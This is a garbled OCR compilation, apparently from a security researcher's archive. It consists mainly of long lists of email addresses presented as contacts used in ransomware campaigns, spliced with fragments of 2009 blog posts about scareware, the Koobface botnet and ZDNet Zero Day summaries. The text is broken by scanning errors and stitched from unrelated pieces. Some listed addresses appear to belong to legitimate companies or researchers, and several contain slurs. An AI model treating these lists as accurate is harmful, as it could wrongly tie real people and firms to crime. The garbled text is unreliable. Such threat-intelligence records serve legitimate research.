decry1@cock.li 
niggapoopool23@protonmail.com 
DharmaParrack@protonmail.com 
naes-ni@protonmail.com 
nbizarrio@venom.io 
blower@fireman.cc 
DatarestOre@protonmail.com 
eula.2052.txt.coder007@protonmail.com 
french101@cock.li 
nFridaFarko@protonmail.com 
robocript@india.com 
royroy@cock.li 
1413201760@qq.com 
newwave@airmail.cc 

26410 


Honeylock@protonmail.com 
justbtcwillhelpu@firemail.cc 
doris.sammer@rasendmail.com 
InkognitoMan@tutamail.com 
vengisto@firemail.cc 
decryptors@xmpp.is 
vombombom@cock.li 
venom@privatemail.com 
Insane@airmail.cc 
nmydataback@aol.com 
flapalintal950@protonmail.com 
Exte2@protonmail.com 
nmetanl19@mail2tor.com 
unlOckme@cock.|i 
1.kazkavkovkiz@cock.li 
pulpy@protonmail.ch 
jundmd@cock.li 
payoff@cock.li 
gardengarden@cock.li 
WWXXxXxXxXwWWw@protonmail.com 
crab7765@protonmail.com 
bitsupportz@protonmail.com 
ex _parvis@protonmail.com 
AskHelp@protonmail.com 
vendetta553@gmx.de 
colambia@tutanota.com 
cryptosupport@tormail.net 
Dataadecrypt@Cock.|i 

mmm _reborn@tutamail.com 
gladius rectus@india.com 
regem _regum@aol.com.onion 
Encrypted Roblox@mail.com 
getthefiles2@protonmail.ch 
allback@protonmail.ch 
Badfail@qq.com 


26411 


windat@protonmail.com 
encoderdecryption@yandex.ru 
lion7872@india.com 
FlamingoRans@tutamail.com 
g.kulahmet@protonmail.com 
Radxlove7@india.com 
internationalassistance@tutanota.com 
nmiddleman2020@protonmail.com 
rep _stosd@protonmail.com 
Filegorillal388@india.com 
mrdoc8869@xmpp.jp 
admin@bugsfighter.com 
easybackup@aol.com 
TheYuCheng@yeah.net 
klowershit1835@tutanota.com 
nGlenna52@2606.com 
decode99999@gmail.com 
nhelprestoremanager@airmail.cc 
nenter _software@india.com 
cavefat@tuta.io 
newhelper24@protonmail.ch 
VitalyYermakov@cock.li 
jerjis@tutamail.com 
python.exe.coder007@protonmail.com 
torchwood0Q000@yandex.com 
Helprestore@firemail.cc 
Colecyrus@mail.com 
decryptbots@cock.li 

btc _bitts@protonmail.com 
nAdamBrown89@protonmail.com 
test@mail.com 
DecryptFox@protonmail.com 
fantom12@techemail.com 
support@amazon.com 
contactfileszip@email.tg 
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[13]Sampled scareware also [14]phones-back to mysecurityguru .cn - 64.86.16.170 - 
Email: andrew.fobecket@gmail.com, the same phone-back domain was used in the scareware 
sampled from the [15]NYTimes.com malvertising attack, with the same email also belonging 
to a scareware domain (mainsecsys .info) listed in the [16]Diverse Portfolio of Fake Security 
Software - Part Twenty Two for July. 


The cybercrime powerhouse behind all these attacks, continues maintaining the largest 
market share of [17]systematic Web 2.0 abuse, and that includes their involvement in [18]the 
Koobface botnet. 


Related posts: 

[19]Dissecting Koobface Worm’s Twitter Campaign 

[20]Twitter Worm Mikeyy Keywords Hijacked to Serve Scareware 
[21]From Ukraine with Bogus Twitter, LinkedIn and Scribd Accounts 


[22]From Ukraine with Scareware Serving Tweets, Bogus LinkedIn/Scribd Accounts, and 
Blackhat SEO Farms 


[23]The Twitter Malware Campaign Wants to Bank With You 
[24]Does Twitter’s malware link filter really work? 

[25]Commercial Twitter spamming tool hits the market 
[26]Cybercriminals hijack Twitter trending topics to serve malware 
[27]Spammers harvesting emails from Twitter - in real time 


[28]Twitter hit by multiple variants of XSS worm[29] 


This post has been reproduced from [30]Dancho Danchev’s blog. 
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aajyjnn6é4htaosrk@sharklasers.com 


supporton|l@cock.li 
uncrypt2022@outlook.com 
abat2019@aol.com 
asdqwer123@cock.li 
microsoftxyber@hackindex.com 
recoverydata52@protonmail.com 
RomanchukEyla@protonmail.com 
allhelpl16@gmail.com 
Helpcrypt1@tutanota.com 
tuyuljahat@hotmail.com 
cryptolifeguard@cock.li 
naviteam@aol.com 


meowcorp2022@aol.com 
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dr.helplL00@mailfence.com 
reasonablehelp@outlook.com 
Iwei@malwarebytes.com 
paycrypt@aol.com 
happydataowner@firemail.cc 
harmagedon0707@airmail.cc 
-paycrypt@aol.com 
Nomoneynohoney@india.com 
under _amur@protonmail.ch 
nDeanna62@5595.com 
Dcr@cumallover.me 
alexwind46@aol.com 
momsbestfriend@protonmail.com 
9eab6e85bd12b@tutanota.com 
ViladimirScherbinin1991@gmail.com 
openpgp@foxmail.com 
nordfox@aol.com 
aihlp24@tuta.io 
itstome@cock.li 
octopusdoc@airmail.cc 
Files2020@mailfence.com 
anna _stepanova@aol.com 
axitrun@cock.|i 
160505@tt3j2x4k5ycaa5zt.onion 
4reserve@tuta.io 
pskovmama@secmail.pro 
unlock0101@protonmail.com 
nyougame@protonmail.ch 
pol.aris@opentrash.com 
ncobainOransom@cock.li 
nsupport@bestyourmail.ch 
deltatechit@protonmail.com 
lovelife@xabber.org 
letitbedecryptedzi@gmail.com 
yougame@protonmail.ch 
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rapid.file@tuta.io 
leenapidx@snakebite.com 
piterpen02@keemail.me 
charmant@firemail.cc 
flsunlocker@yahoo.com 
Trojan.estemaniii@airmail.cc 
bereznikdown@firemail.cc 
khiwosang@gmail.com 
unlockdata@foxmail.com 
panda7499@india.com 
ursa2277@india.com 
Trojan.Merosa@india.com 
Matrix9643@yahoo.com 
2.Hariliuios@tutanota.com 
pouranesd@cliptik.net 
some@mail.ru 
pilotpilot0O88@gmail.com 
djangOunchain3d@protonmail.com 
Helpassistant2120@mail.fr 
helpforyou@firemail.cc 
rdpmanager@airmail.cc 
SafeGman@protonmail.co 
datarecovery@airmail.cc 
painplain98@protonmail.com 
gentilpascal@bitmessage.ch 
Vitaly. Yermakov@protonmail.com 
allback@cock.li 
filelm@yandex.com 
redboot@memeware.net 
Phobos.encrypt@qq.com 
2020@outlook.com 

1_kill yourself 1@protonmail.com 
AsuxidOruraep1999@o2.pl 
helpmanager@mail.ch 


davidblainemagique@gmail.com 
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ghjujy@tuta.io 
nblower@firemail.cc 

moloch _helpdesk@tutanota.com 
UneGarcOn1@cock.li 

Santa _helper@protonmail.com 
ostashkinpp@gmail.com 
Cryfixfoo@qq.com 
Pdfhelp@india.com 
spystarl1@onionmail.com 
databack2@protonmail.com 
Mk _cyrox@aol.com 
Thedon78@mail.com 
Decryptoffice@tuta.io 
QicifomuEjijika@o2.pl 
datebatut@pochta.com 
recoverydata98@protonmail.com 
oceanm@engineer.com 
A654763764@qq.com 
b4ckuppcl@yandex.com 
nAhmad26@2336.com 
xp10.ransom@gmail.com 
helper@bitmessage.ch 
paydecryption@qq.com 
filesreturn247@protonmail.com 
abramova@sabona.ru 
Mr.TeslaBrain@protonmail.com 
faremar@cock.li 
selenadymond@gmail.com 
intercobros@protonmail.com 
fabianwosar@inbox.ru 
restoredjvu@india.com 
trunhelp@yandex.ru 
mcrypt2019@yandex.com 
debri@keemail.me 
JamesBaker78@tutanota.com 
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comodosec@india.com 
Blackdragon43@yahoo.com 
gold84@cock.|i 
data1992@protonmail.com 
suplO@oath.com 
nphrasitliter1981@protonmail.com 
nsuplO@post.com 
return.data@qq.com 
3475857701@qq.com 
badbeeteam@mail.cc 
unblocked@tuta.io 
cryptservice@jabber.ua 
bichkova@secmail.pro 
BCPFILE17@tutanota.com 
masterlrestore@cock.li 
muhendis@mail.ua 
bbqb@protonmail.com 
decryption@qbmail.biz 
null _ptr@tutanota.de 
n0405000330@inbox.ru 
legalrestore@airmail.cc 
Couwetlzotofo@o2.pl 
Mayth24@aol.com 
Decrypter@msgsafe.io 
godecrypt@onionmail.org 
MayarChenot@protonmail.com 
incantofiles@india.com 
goodmen@cock.li 
viethckr@yandex.com 
SafeGmanefiremail.cc 
nservicedigilogos@protonmail.com 
mr.leen@protonmail.com 
FilesRecoverFR@Onionmail.org 
Repairme2017@keemail.me 
doctorhelp2120@cock.li 
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filesreturn247@gmx.de 
random _anonymous@gmail.com 
skynet45@cock.li 
helpnetin@protonmail.com 
VovanAndLexus@cock.|i 
jokeroo@exploit.im 
fileln@yandex.com 
FileRec69@mailfence.com 
adminsysloker@airmail.cc 
1lrestOre@protonmail.com 
helpmeonce@mail.ru 
helprestoremanager@airmail.cc 
bobwhite@cock.li 
Lavandos@dr.com 
support@robsmithmba.com 
nmediatorforyou@mail.fr 
incongnitoman@protonmail.com 
flower.harris@tutanota.com 
Buydecrypt@qq.com 
brcodes17@gmail.com 
Starbax@tutanota.com 
help@inboxhub.net 
decrypt.russ@protonmail.com 
mykeyhelp@protonmail.com 
black.mirror@qq.com 
mewellwisher@protonmail.ch 
btc.freshOl@gmail.com 
ScOrpio@mailfence.com 
Suppteam01@india.com 
6ix9@asia.com 
nChina.Helper@india.com 
7399@sigaint.org 
nkhalate@tutanota.com 
Zagrec@protonmail.com 

new _wave@tuta.io 
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5.10 October 


5.10.1 Summarizing Zero Day’s Posts for September (2009-10-01 15:38) 


ZOneT 


ZDNet Search: a 


Home News & Blogs Videos White Papers Downloads v s Popular - 


Ryan Naraine and Dancho Danchev 
> Mabie (ass OP trad slen HH ue 


Pick a blog category ba | view | 


ZONet Must Reed: The H] 
Hijacking Windows System Restore for cybercrime Spo 
profits 

Cyber crime gangs m China are penetrating the hard disk recovery cards on oe Popular Sanity 
computers in Internet cafes and using 3 0 gree on of zero-day flaws, Saver Videos 
FOOKRS and ARP spoofing techrques to... C 


= Check out the top 10 ‘ Feo ss05 te 
September 30th, 2009 reasons to upgrade te >) 11 eatoaeret 


New botnet hides commands as JPEG | Windows Server 2008 R2. — " =| 


images Five shes. that 
? ccm tn essshety ee you aren't cut ont 
te be a CIO 


Sponsored Links 


‘ . - . j Complete Code Analysis 
al g0Takpads -S2 &@ 2 & +23 Bugs & defects are history with 
Cowerity Integrty Center Leadershio vs, 
management; 
Malware Remover Understand the 
Download differences 


Securty researchers have stumbled on a mew botnet that uses an 
wteresting techreque to mask ts nefanous intermons. 


Free Malware Scan. Winner of the Best 


Monbal/Oikho " Per Trojan Gownio . 
The Monial/Oikhora botmet, whech is pushang out Trojan downloaders to Anti-Spyware. Rated 5 Staes 


infected machines, 1 encoding the exstructons to appear as ¢ the 
command-and-comtrel server is returreng a PEG Simos fe, — to 
SeaweWorks researcher Jason Miletary. Read the of th . 


J i i 
September 30th, 2009 Recent Entries Een seni so ind 


RIM plugs BlackBerry phishing hole — 


The following is a brief summary of all of my posts at ZDNet’s [1]Zero Day for September. 


You can also go through previous summaries for [2]August, [3]July, [4]June, [5]May, [6]April, 
[7]March, [8]February, [9]January, [10]December, [11]November, [12]October, [13]Septem- 
ber, [14]August and [15]July, as well as subscribe to my [16]personal RSS feed or [17]Zero 
Day’s main feed. 


Notable articles include: [18]The ultimate guide to scareware protection + [19]Gallery; 
[20]’'Anonymous’ group attempts DDoS attack against Australian government (Operation 
Didgeridie) and [21]Modern banker malware undermines two-factor authentication. 


01. [22]Scareware goes Green 

02. [23]’Anonymous’ group attempts DDoS attack against Australian government 
03. [24]Cutwail botnet spamming ’IRS unreported income’ themed malware 

04. [25]Citizens Financial sued for insufficient E-Banking security 

05. [26]iPhone’s anti-phishing protection offers inconsistent results 
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supporthelp@airmail.cc 
BM-2cUPRnXJRUFYKcDUCLugjrCPY58nrvHrAV@bitmessage.ch 
AdminOw!l@bitmessage.de 
05250lock@tut.com 
Cocoslim98@gmail.com 
name4v@keemail.me 

tset2@gmail.com 
merosadecryption@gmail.com 
infokey24@india.com 
schusterboss@cock.|i 
paradisecity@cock.li 
Wbgroup022@gmail.com 
File.decrypt@onionmail.org 
bitcoins12@tutanota.com 
g.kulahmet@secmail.pro 
k.nishant@itorizin.in 

ix@hotmail.com 
nrecoverydata@india.com 
nginxhole@tutanota.com 
firmadatalari@mail.ru 
vapeefiles@aol.com 
lechiffre@mailchuck.com 
nBM-2cXonzj9ovn5qdX2MrwMK4j3qCquXBKo4h@bitmessage.ch 
nhelpshadow@india.com 
restoresales@airmail.cc 
ZaszyfrowanePliki@ZaszyfrowanePliki.us 
cmdroot@airmail.cc 
info@morris2uk.com 
desktopman228@india.com 
Billyl11@4302.com 
ursa2277@yahoo.com 
sherlokcock@cock.li 

fast decrypt _and_protect@tutanota.com 
files640@gmail.com 


szem@tutanota.com 
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Funox@ya.ru 
needhelp@disroot.org 
padredelicato@cock.li 
Bnd54@mail2tor.com 
support4you@protonmail.com 
RobSmithMba@protonmail.com 
iron@techmail.info 
hto2018@yandex.ru 
keypass@bitmessage.ch 
kesoma32@horsefucker.org 
savefiles@india.co 
reverso@cock.li 
fox2278@gmx.de 
w3qupe@tuta.io 
abka1001@gmail.com 
stopfilesrestore@bitmessage.ch 
dekode@qq.com 
belgorod8712kozos@dnmx.org 
backuppcl@dr.com 
de.picocode@gmail.com 
repairdb@mail.fr 
managersmaers@tutanota.com 
Zeman@tutanota.de 
mosteros@firemail.cc 
clubnika@elude.in 
FileEngineering@elude.in 
Systemdown@india.com 
help24decrypt@qq.com 

anton _ivan _8989@mail.ru 
TomLee24@tuta.io 
siniyzabor@protonmail.com 
soetrisno.bachir@kein.go.id 
Dercypt@protonmail.com 
Noreply@kpnmail.eu 
SwOrdflsh@cock.li 
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bufalo@firemail.cc 

bkp@cock.|i 
JohnPennegZZ@aol.com 
healforyou@cock.|i 
loybranunun1975@protonmail.com 
LR FWS_H2M _ET@protonmail.ch 
d3g1d5@gmail.com 
secres@gmx.de 
divo21mir@cock.li 

52pojie mail@protonmail.com 
kuk1@tuta.io 
Look1213@protonmail.com 
gervasiy.menyaev@gmail.com 
ICanFixYourFiles@tutanota.com 
securityl11220@gmail.com 
JeanRenoAParis@protonmail.com 
chinarecoverycompany@airmail.cc 
Unlockmeplease@cock.|i 
chily65@proton.me 
yeahdesync@airmail.cc 
kronstar21@gmail.com 

de _cryption@tuta.io 
blockage@tormail.org 
LindaHunter474@gmail.com 
nhelpmanager@mail.ch 
decryptor911@airmail.cc 
artemy75@protonmail.com 
dmo904zB@protonmail.com 
wilhelmkox@tutanota.com 
fedelsupportagent@cock.li 
paydear@aol.com 
lafoievologjaninl23@tutanota.com 
anony.killers@protonmail.com 
CyberSCCP@protonmail.com 
Info@fugunator.de 
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Logan8833@aol.com 
nMayth24@protonmail.com 
tuhafcoderus@protonmail.com 
wayneevenson@protonmail.com 
filel@keemail.me 

Bit decrypt@protonmail.com 
Pumarestore@india.com 
aq811@tutoanota.com 
rtddecrypt@airmail.cc 
fonix@tuta.io 
plaguel7@riseup.net 
lewisswaffield.a@aol.com 
logical.disk@yandex.com 
unlockme123@protonmail.com 
vauvau@cock.li 
crypthelp@qq.com 
carnovaleimpres@dnmx.org 
synack@secmail.pro 
answer@pcworld.com 
berne.fiddell@aol.com 
Rcru64@cock.lu 
lovelife@cumallover.me 
tools1990m@gmail.com 
aoneder@mail.ru 
jonskuper578@protonmail.com 
Payransom@qq.com 
Trojan.QyavauZehyco1994@o2.pl 
decryptmefinger@gmail.com 
backuppc@tuta.io 
nAskHelp@tutanota.com 
decrypt _.files@cyberfear.com 
paymeme@cock.li 
nomoreletters@protonmail.ch 
nHelpassistant2120@mail.fr 
helpdjvu@india.com 
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Batman _good@aol.com 
crypt31@proton.me 
nginxhole@gjessmail.com 
blower@india.com 
Grizzly@airmail.cc 
email-iizomer@aol.com 

aam _sysadmin@protonmail.com 
technopc@tutanota.com 
maxidecrypt@protonmail.com 
execute@protonmail.com 
datadecryption@countermail.com 
crab1917@gmx.de 
hep!l1112@aol.com 
datarestOre@xmpp.jp 
koxic@protonmail.com 
masterlrestore@cock.li 
nmanager@time2mail.ch 
decrypt@files.mn 
french101@protonmail.ch 
emaill _info@cryptedfiles. biz 
maill helpme@protonmail.com 
rx99@cock.li 


Trojan.Win64.CottleAkela@protonmail.com 


nenter software@aol.com 
abc@countermail.com 
mishacat@cock.li 

ndec _helper@aol.com 
HanzOttoschmidt@protonmail.com 
logiteam@protonmail.com 
decryptex@airmail.cc 
Myfiles.sir@gmail.com 
crossroads2371@protonmail.ch 
ucos2@elude.in 
CottleAkela@protonmail.com 


nullforwarding@qualityservice.com 
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Veracrypt@india.com 
jbomani@protonmail.com 
nmode@tutanota.com 
motox2016@mail2tor.com 
xiaoba 666@163.com 
cryptservice@inbox.ru 
nBilly20@4425.com 
infovip@airmail.cc 
document2.txt.SN-6862051502902366-kiaracript@gmail.com 
error-crypt@protonmail.com 
ops@mailc.net 
AdamBrown89@tutanota.com 
Partytime123@default.rs 
infocrypt@india.com 
Love.server@mail.ru 
Buddy@criptext.com 
carnovaleimpres@cock.li 
backtonormal@foxmail.com 
no.xm@protonmail.ch 
rikyrank113@protonmail.com 
beijing520@cock.|i 
onionhunter@onionmail.org 
decrsup@cock.li 
juniorwanme@tutanota.com 
nsupportsys@airmail.cc 
ht2707@email.vccs.edu 
jimmtheworm@dicksinmyan.us 
nhelprestore@firemail.cc 
xser@tutanota.com 
decoder83540@protonmail.com 
karapooz@secmail.pro 
Mayth24@protonmail.com 
trueransom@mail2tor.com 
systemsupport@memeware.net 


Devicerestore@india.com 
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vpsimf@gmail.com 
dorispackman@tuta.io 
Billwong73@yahoo.com 
Blaine98@8771.com 
cryptlive@aol.com 
payoff@bigmir.net 

zip@email.tg 

robocript@gmx.us 

cobain ransom@protonmail.com 
hildaseriesnetflix125@horsefucker.org 
fantomd12@yandex.ru 
rapidka@cock.li 
brianmaps@gmail.com 
decrypting@tormail.org 
Xtredboy@protonmail.com 
nnydataback@aol.com 
yourfilesl@cock.li 
manager@mailtemp.ch 
datadecryption@bitmessage.ch 
goodencrypt88@gmail.com 

back me@foxmail.com 
Decryptionsupport911@airmail.cc 
helpasial6@gmail.com 
datarc89@cyberfear.com 
nhealforyou@cock.li 
Melme@india.com 
doctor666@mail.fr 
nomnisystems@airmail.cc 

Grand _car@aol.com 
BM-2cVCMjYXg5ZwLi2t6mETUeQYHMNDmbfFA2@bitmessage.ch 
warthunder089@tutanota.de 
nsupport@robsmithmba.com 
datadecryption@india.com 
nunlckr@protonmail.com 


supporton|@airmail.cc 
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AdamBrown89@criptext.com 
Keyfiles@cock.|i 

supportsys@airmail.cc 
nfilekerk@tutanota.com 
recoverymydata@protonmail.com 
bitlockerlock.unlock@gmail.com 
ShadowofDeath@elude.in 
HOlyGhOst@mail2tor.com 
Admin@decryption.biz 
jonskuper578@india.com 
mr.crypt@aol.com 
Helpsdec@tutanota.com 
fa5d9dfc@gwisin4yznpdtzq424i3la6oqy5evublod4zbhddzuxcnr34kgfokwad.onion 
agent5305@firemail.cc 
blackbyte@onionmail.org 
devilguy666@protonmail.com 
leesb@coscokorea.com 
Supportfriend@india.com 
vcredist.omp.coder007@protonmail.com 
unixc47@gmail.com 

uffla52pojie _mail@protonmail.com 
nanonimus.mr@yahoo.com 
Hellstaff@india.com 

brovsky@aol.com 
Bitcoinrush@imail.com 
Trojan.Win32.QyavauZehyco1994@o2.pl 
krupalupium@india.com 
helpteam@mail.ch 
NetGanster@protonmail.com 
archive2010.zip.SN-6633475505259148-kiaracript@gmail.com 
helpadmin2@protonmail.com 
imBoristheBlade@protonmail.com 
nordfox@protonmail.com 
badbeeteam@cock.|i 
xzet@tutanota.com 
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4lok3r@protonmail.com 
Siddhiup2@india.com 
mr.dec@protonmail.com 
SecurCyber@yahoo.com 
decrypt@techie.com 
returndb@seznam.cz 
nBackuppc@protonmail.com 
MilesFlannagan@protonmail.com 
Restore@protonmail.ch 
bigboss@thesecure.biz 
Trojan.crypted _luedtkis@feudtory.com 
DutyuEnugev89@o2.pl 
restorefiles@protonmail.ch 
supportdoctor@protonmail.com 
Killback@protonmail.com 
SupportOdveta@elude.in 
pol.aris@tutanota.com 
ferast@firemail.cc 


Sample Protonmail email address accounts known to have been involved in various ran- 
somware themed campaigns include: 


Brilliancebk@protonmail.com 
nCyberwars@protonmail.com 
pentaxyz777@protonmail.com 
hacker _decryption@protonmail.ch 
iknowyouandiseeyou@protonmail.ch 
recoverydata99@protonmail.com 
Bossi tosi@protonmail.com 
FreeWizard9@protonmail.com 
Blitzkriegoc@protonmail.com 
05250lock@protonmail.com 
westlan@protonmail.ch 
geniusid@protonmail.ch 
flower.harris@protonmail.com 
t310ea89b4347@protonmail.com 
phrasitliter1981@protonmail.com 
technopc@protonmail.com 
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nCobra _Locker@protonmail.com 
montserrat501@protonmail.com 
BTCBREWERY@protonmail.com 
spaxl425@protonmail.com 
petrov441@protonmail.com 
fmhir@protonmail.com 
nrecoverymydata@protonmail.com 
tomascry@protonmail.com 
filedownload2020@protonmail.com 
Deccoder431@protonmail.com 
nRobSmithMba@protonmail.com 
Lizardbkup@protonmail.com 
ncrab1917@protonmail.com 
Recuperadados@protonmail.com 
ncrypto7892@protonmail.com 
TimisoaraHackerleam@protonmail.com 
DecrypterSupport@protonmail.com 
RECOVERUNKNOWN@protonmail.com 
vashmail@protonmail.com 
geneve020@protonmail.com 
recfiles@protonmail.com 
n0301192293@protonmail.com 
doctorSune@protonmail.com 
crypto7892@protonmail.com 
dogeremembersss@protonmail.ch 
nEmpty003@protonmail.com 
EMAIL@protonmail.com 
fixprotectvvv@protonmail.com 
johnsonwhate@protonmail.com 
decodeodveta@protonmail.com 
jOra@protonmail.com 
myphoto.jpg.nefartanulo@protonmail.com 
andrey.taranov@protonmail.com 
rescuerr@protonmail.com 
Cyberwars@protonmail.com 
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06. [27]9/11 related keywords hijacked to serve scareware 

07. [28]The ultimate guide to scareware protection + [29]Gallery 

08. [30]Phishers introduce ’Chat-in-the-Middle’ fraud tactic 

09. [31]Scareware scammers hijack Twitter trending topics 

10. [32]Modern banker malware undermines two-factor authentication 

. [33]Chinese hackers launch targeted attacks against foreign correspondents 
12. [34]Research: Small DIY botnets prevalent in enterprise networks 


. http://blogs .zdnet.com/securit 
. http: //ddanchev. blogspot .com/2009/09/summarizing-zero-days-posts-for-august .htm 


ttp://ddanchev.blogspot.com/2009/08/summarizing-zero-days-posts-for-july.htm 


= 
= 


ttp://ddanchev. blogspot .com/2009/07/summarizing-zero-days-posts-for-june.htm 


. http: //ddanchev. blogspot .com/2009/06/summarizing-zero-days-posts-for-may.html 


ttp://ddanchev.blogspot.com/2009/05/summarizing-zero-days-posts-for-april.htm 


. http://ddanchev. blogspot .com/2009/03/summarizing-zero-days-posts-for-march.htm 
. http: //ddanchev.blogspot .com/2009/03/summarizing-zero-days-posts-for.htm 


ttp://ddanchev.blogspot.com/2009/02/summarizing-zero-days-posts-for- january. htm 


10. 
12. 
13 


15. http://ddanchev. blogspot .com/2008/08/summarizing-zero-days-posts-for- july. htm 
16. http://updates.zdnet.com/tags/danchot+tdanchev .htm1?t=0&s=0é0=1émode=rss 

17 
18 
19 


20. http://blogs.zdnet.com/security/?p=4234 


21. 
22. 
23, 
24, 
25, 
26. 
27. 
28, 
29, 


30 


31, 
32. 
33, 
34, 
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ncrab7765@protonmail.com 

china _jm@protonmail.ch 
m4xroothackerteam@protonmail.com 
loggitore1984@protonmail.com 
Corpseworm@protonmail.com 
dec.service@protonmail.com 
dcyptfils@protonmail.ch 
Ixhlp@protonmail.com 
quiddoss@protonmail.com 
nefartanulo@protonmail.com 
youneedmail@protonmail.com 
kfrvokr@protonmail.ch 
help73@protonmail.com 
softs98@protonmail.com 
Recoverybat@protonmail.com 
aid.keepcalm@protonmail.com 
SayanWalsworth96@protonmail.com 
universe1@protonmail.ch 
alexwind46@protonmail.com 
ufflaitunes decrypt@protonmail.com 
burgeer@protonmail.ch 
nExte2@protonmail.com 
JinMaglaya@protonmail.com 
recover85@protonmail.com 
Trojan.Win64.Bitcharity@protonmail.com.com 
n0Ox69x@protonmail.com 
blackgoldI23@protonmail.com 
BatHelp@protonmail.com 
ndecoder-help@protonmail.com 
nnomoreletters@protonmail.ch 
fun63s@protonmail.com 
bsprjl020@protonmail.com 
decrypt25@protonmail.com 
recovery.company@protonmail.com 


fileisafe@protonmail.com 
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nguifullchartill1970@protonmail.com 
gluttonBD@protonmail.com 
cryptomavens@protonmail.com 
decoder-help@protonmail.com 
panda7499@protonmail.com 
mailnitrom@protonmail.ch 
newneo1312@protonmail.com 
hlpp@protonmail.ch 
Tizer77234@protonmail.com 
cryptghOst@protonmail.com 
egalytyy@protonmail.com 
cryptbit2.0@protonmail.com 
decrypt01.cq@protonmail.com 
telegramfirefox2029@protonmail.com 
servicedigilogos@protonmail.com 
Nowayout@protonmail.com 
niggapoopool23@protonmail.com 
DharmaParrack@protonmail.com 
naes-ni@protonmail.com 
DatarestOre@protonmail.com 
eula.2052.txt.coder007@protonmail.com 
nFridaFarko@protonmail.com 
Honeylock@protonmail.com 
flapalintal950@protonmail.com 
Exte2@protonmail.com 
pulpy@protonmail.ch 
WWXxXxXxXxwW@protonmail.com 
crab7765@protonmail.com 
bitsupportz@protonmail.com 

ex _parvis@protonmail.com 
AskHelp@protonmail.com 
getthefiles2@protonmail.ch 
allback@protonmail.ch 
windat@protonmail.com 
g.kulahmet@protonmail.com 
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nmiddleman2020@protonmail.com 
rep _stosd@protonmail.com 
newhelper24@protonmail.ch 
python.exe.coder007@protonmail.com 
btc _bitts@protonmail.com 
nAdamBrown89@protonmail.com 
DecryptFox@protonmail.com 
AdvancedBackup@protonmail.com 
vine77725@protonmail.com 
reservedecryption@protonmail.com 
Filedecryptor@protonmail.com 
itunes decrypt@protonmail.com 
xaodecrypt@protonmail.com 
fox2278@protonmail.com 
duskeer@protonmail.com 
Leviathanl13@protonmail.com 
jackgreen13@protonmail.com 


blackroot54@protonmail.com 


support _blackkingdom2@protonmail.com 


happy _sysadmin@protonmail.ch 
Steven77xx@protonmail.com 
aes-ni@protonmail.com 
batary5588@protonmail.com 
omegax0@protonmail.com 
stephanie.jones2024@protonmail.com 
excuses@protonmail.com 
flowerboard@protonmail.com 
khalate@protonmail.com 
mammon0503@protonmail.com 
ncammoral9@protonmail.com 
JamesBaker78@protonmail.com 
garryweber@protonmail.ch 
datahelper@protonmail.com 
anoncrack@protonmail.com 


geneve010@protonmail.com 
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bondbond1@protonmail.com 
r3vo@protonmail.com 
slanler111@protonmail.com 
shellexec@protonmail.com 
datareturn@protonmail.com 
neladovinl1975@protonmail.com 
pentros30@protonmail.com 
iracomp2@protonmail.ch 
decryptmystuff@protonmail.com 
fairman0023@protonmail.com 
python2.exe.coder007@protonmail.com 
servicedeskpay@protonmail.com 
bitkick@protonmail.com 
yoursalvations@protonmail.ch 
fixfiles@protonmail.ch 
vote2024forjo@protonmail.com 
guifullchartill9 70@protonmail.com 
eladovinl1975@protonmail.com 
helpteam38@protonmail.com 
mantiticvil976@protonmail.com 
BackFileHelp@protonmail.com 
pianist6@protonmail.com 
decrypteasy@protonmail.cc 
0301192293@protonmail.com 
brian.r.goodwin@protonmail.com 
nJamesBaker78@protonmail.com 
recover 24 7@protonmail.com 
FridaFarko@protonmail.com 
lafoievologjaninl23@protonmail.com 
grupposupp@protonmail.ch 
fileb@protonmail.com 
decryptfilekhoda@protonmail.com 
bugbugo@protonmail.com 
jj@protonmail.ch 
money.doc.coder007@protonmail.com 
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ccryptor@protonmail.com 
mattpear@protonmail.com 
databang2020@protonmail.com 
getscoin2@protonmail.com 
ndogeremembersss@protonmail.ch 
che808@protonmail.com 

mrddnet _support@protonmail.ch 


anticrypto@protonmail.com 


TagFile S.txt.coder007@protonmail.com 


lolitahelp@protonmail.com 
middleman2020@protonmail.com 
xersami@protonmail.com 
InfiniteDecryptor@protonmail.com 
FlamingoRans@protonmail.com 
ooosferaplus@protonmail.com 
crypto _wannacash@protonmail.com 
dresdent@protonmail.com 
nfahydremu1981@protonmail.com 
kts2018@protonmail.com 
ndatahelper@protonmail.com 
SchreiberEleonora@protonmail.com 
salutem@protonmail.com 
mstr.hack@protonmail.com 
Decryptions@protonmail.com 
getscoin3@protonmail.com 
iracomp4@protonmail.ch 
0x69x@protonmail.com 


the.dodger@protonmail.com 


install.exe.coder007@protonmail.com 


robocript@protonmail.ch 
ReftuOne@protonmail.com 
iamfath3r@protonmail.com 
rozlok@protonmail.com 
backinfo@protonmail.com 


rebushelp@protonmail.com 
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Panzergen552@protonmail.com 
Recoveryhelp2019@protonmail.com 
cr1-silvergold1@protonmail.com 
aztecdecrypt@protonmail.com 
decrypt24@protonmail.com 
Frank.Sinatral010@protonmail.com 
rupp@protonmail.ch 
nBackuppcl@protonmail.com 
Catsexy@protonmail.com 
onimransom@protonmail.com 
moloch _helpdesk@protonmail.ch 
nfilelL@protonmail.com 
grepmord@protonmail.com 
ndecoder83540@protonmail.com 
qqxxxxxqq@protonmail.com 
SuzuMcpherson@protonmail.com 
Cobra _Locker2.0@protonmail.com 
anon4113@protonmail.com 
Trojan.CottleAkela@protonmail.com 
ThomasRaymond@protonmail.com 
poeasws@protonmail.com 
hiddentear@protonmail.com 
AbbsChevis@protonmail.com 
supportfiless24@protonmail.ch 
Malakot@protonmail.com 
backfile99@protonmail.com 
python2.7.exe.coder007@protonmail.com 
Wecanhelp@protonmail.com 
getyourdata@protonmail.com 
nikolateslaproton@protonmail.com 
kvlly@protonmail.ch 
mary.weston@protonmail.com 
unlckr@protonmail.com 
chines34@protonmail.ch 
decryptionfiles@protonmail.com 
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BlackMajor@protonmail.com 
ivanmalahov@protonmail.com 
achtung _admin@protonmail.com 
po2977@protonmail.com 
backuppc@protonmail.com 
Cryptmanager@protonmail.com 
rdpconnect@protonmail.com 
evopro@protonmail.com 
GeorjeHalique@protonmail.com 
vendetta553@protonmail.com 
trupm@protonmail.com 


symetrikk@protonmail.com 


PhanthavongsaNeveyah@protonmail.com 


albert9957@protonmail.com 
crab1917@protonmail.com 
oceannew _vb@protonmail.com 
ScorpionEncryption@protonmail.com 
Yourencrypter@protonmail.ch 
alix1011@protonmail.com 
hccapx@protonmail.com 
decryptxxx@protonmail.co 
zorab28@protonmail.com 
bronmerkberpal1976@protonmail.com 
Tbr66@protonmail.com 
X280@protonmail.com 
